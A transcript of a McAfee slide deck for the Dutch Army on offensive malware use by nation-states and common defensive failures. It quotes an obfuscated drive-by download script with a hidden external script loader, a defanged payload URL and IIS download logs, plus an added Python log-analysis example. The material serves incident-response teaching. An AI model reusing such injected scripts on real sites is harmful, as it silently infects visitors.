Offensive malware usage and defense

Post on 26-May-2015


Presentation for the Dutch Army around cyberwarfare and the usage of malware.

Transcript of Offensive malware usage and defense

Malware Offensive usage and how to defend

Christiaan Beek

McAfee Professional Services

Agenda

• $whoami

• Examples

• Offensive ways of using malware

• What goes wrong

• Defense recommendations

• Final thoughts

> whoami

• Christiaan Beek

• Practice lead IR & Forensics EMEA

• Developer/Instructor MFIRE

• Training CERTS

A Little Background

Foundstone Services – McAfee Strategic Security

OFFENSE

Offensive usage of malware

Sectors: Energy & Infra, Financial, Medical, Mobile, Defense

Offensive usage of malware

Why malware?

• low profile during preparation

• many options to spread / infect

• many ways to hide

• self destruct mechanism

• many ways to transfer data to

Offensive usage of malware

• More and more discovery of malware frameworks

• Multiple modules /components

• Written by pros – sponsored by nations

Offensive - What’s Different?

Development:

• Nation-States

• Truly customized payloads

Delivery:

• Zero day propagation

• Multi-vectored: Bluetooth, USB, network

Detection:

• Digitally signed with compromised certificates

• Outbound exfiltration masking

Command & Control:

• Central command

• Modular payloads

Intent:

• Surveillance

• Disrupt / Destroy

Stages of an attack:

Stages of an attack – first script

<script type="text/javascript" src="swfobject.js"></script>
<script src=jpg.js></script>
<script type="text/javascript">
if(document.cookie.indexOf("DCHJEik8=")==-1 && hiOC2.indexOf("linux")<=-1 && hiOC2.indexOf("bot")==-1 && hiOC2.indexOf("spider")==-1)
var jMJFRp3=deconcept.SWFObjectUtil.getPlayerVersion();
var expires=new Date();
expires.setTime(expires.getTime()+1*60*60*1000);
document.cookie="DCHJEik8=Yes;path=/;expires="+expires.toGMTString();
for(WdkimKX2=0,gNRb4=true,sAgnGw8=["msie","firefox","opera"];gNRb4;WdkimKX2++){gNRb4=gNRb4 && (navigator.userAgent.toLowerCase().indexOf(sAgnGw8[WdkimKX2])>-1);if(WdkimKX2==sAgnGw8.length-1)WdkimKX2=-1;}Hwqq6="0";delete Hwqq6;try{Hwqq6+="0"+"0";}catch(e){yltBe1=unescape;mYSdOxl6 = eval;}CwefLf0="S1+ADphS1(hmacmx8)))^MqiovxR7);}try{new function(){EmIcO0(EJiD6);}}catch(e){try{new function(){Qkrnq6=parseInt;vKFaTPR4(EJiD6);}}catch(e)
}
</script>
<DIV style="VISIBILITY: hidden; WIDTH: 0px; HEIGHT: 0px"><script language="javascript" src="hxxp://count2.51yes……….. 31931&logo=12" charset="gb2312"></script></DIV>

Final destination?:

hxxp://222.7x.xx.xx.xx/x.exe

Inner working?

IIS logs on hacked ‘landing’ server:

9/23/2012 4:06:16 70.49.x.x W3SVC1 80 GET /x.exe

9/23/2012 4:07:46 99.23.x.x W3SVC1 80 GET /x.exe

9/23/2012 4:08:25 93.80.x.x W3SVC1 80 GET /x.exe

9/23/2012 4:14:48 208.91.x.x W3SVC1 80 GET /x.exe

9/23/2012 4:36:05 95.27.x.x W3SVC1 80 GET /pay/x.exe

9/23/2012 5:15:23 208.91.x.x W3SVC1 80 GET /x.exe

9/23/2012 5:29:27 74.125.x.x W3SVC1 80 GET /x.exe
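The log lines above show several unrelated clients fetching the same executable from the compromised landing server within minutes. The Python below is an added example, not code from the slides or from McAfee/Foundstone: it parses lines in that column layout and flags executable paths pulled by several distinct clients inside a sliding window; the regex, the thresholds and the extra control line are assumptions made for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample input: the W3SVC lines from the slide (client IPs masked
# with "x" as on the slide) plus one ordinary page request as a control.
SAMPLE_LOG = """\
9/23/2012 4:06:16 70.49.x.x W3SVC1 80 GET /x.exe
9/23/2012 4:07:46 99.23.x.x W3SVC1 80 GET /x.exe
9/23/2012 4:08:25 93.80.x.x W3SVC1 80 GET /x.exe
9/23/2012 4:14:48 208.91.x.x W3SVC1 80 GET /x.exe
9/23/2012 4:36:05 95.27.x.x W3SVC1 80 GET /pay/x.exe
9/23/2012 5:15:23 208.91.x.x W3SVC1 80 GET /x.exe
9/23/2012 5:29:27 74.125.x.x W3SVC1 80 GET /x.exe
9/23/2012 5:30:00 10.0.x.x W3SVC1 80 GET /index.html
"""

# Columns as laid out on the slide: date time client site port method uri
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) \S+ \d+ (\S+) (\S+)$")

def executable_downloads(log_text):
    """Return (uri, client, timestamp) for every GET of an executable-looking path."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # unparsable line: skip rather than crash on a partial log
        date, time, client, method, uri = m.groups()
        if method == "GET" and uri.lower().endswith((".exe", ".scr", ".dll")):
            ts = datetime.strptime(f"{date} {time}", "%m/%d/%Y %H:%M:%S")
            hits.append((uri, client, ts))
    return hits

def suspicious_payload_paths(log_text, window=timedelta(hours=1), min_clients=3):
    """Map uri -> total distinct clients for each executable that at least
    min_clients distinct clients fetched inside one sliding window. Many unrelated
    hosts pulling the same binary within minutes is the fan-out of a payload server."""
    by_uri = defaultdict(list)
    for uri, client, ts in executable_downloads(log_text):
        by_uri[uri].append((ts, client))
    flagged = {}
    for uri, fetches in by_uri.items():
        fetches.sort()
        for i, (start, _) in enumerate(fetches):
            in_window = {c for t, c in fetches[i:] if t - start <= window}
            if len(in_window) >= min_clients:
                flagged[uri] = len({c for _, c in fetches})
                break
    return flagged
```

On the sample input only /x.exe is flagged (five distinct clients, four of them inside the first hour); /pay/x.exe has a single client and stays below the threshold.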

Dial 80 Or 443

War story

Future usage of malware

Future scenarios

Future scenarios or real...?

An Intel company

What goes wrong regarding Defense?

Problem #1

Many solutions but how to use them?

Forensic Readiness?

Problem #2

No visibility on the network

No correlation of events

Problem #3

Lack of skilled, experienced and dedicated people

Problem #4

No Incident Response procedures

No Dry-run exercise

Problem #5

The attack came from…

Problem #6

Destroying evidence

Problem #7

Who is the system owner?

Who will take action?

Who is allowed to take decisions?

Defense Strategies

The Big “Threat” Picture

Diagram labels: All Threats; All Known Threats; Threats AntiVirus Sees; Threats AntiVirus Protects; Core

The “Core” Security Problem

• “Unauthorized” Execution

– Payload/attachment/link

– Network

– Privilege

• “Authorized” Execution

– Insiders misuse of privilege

Diagram of the malware economy: End Users = Data; Identity Thieves; Spammers; Tool Developers; Vulnerability Discoverers; Malware Developers; Bot Herder

Defense-in-depth

Worthless without:

Final thoughts......

- Incidents happen

- Is forensic & malware readiness on your agenda?

- What needs to be changed in your process?

- Is your {army-unit/company/agency/etc} prepared?

- Did you separate critical infrastructures?

- Can we help you?

Thank you!

Keep in touch:

Email: Christiaan_Beek@McAfee dot com

Twitter: @FSEMEA @Foundstone @ChristaanBeek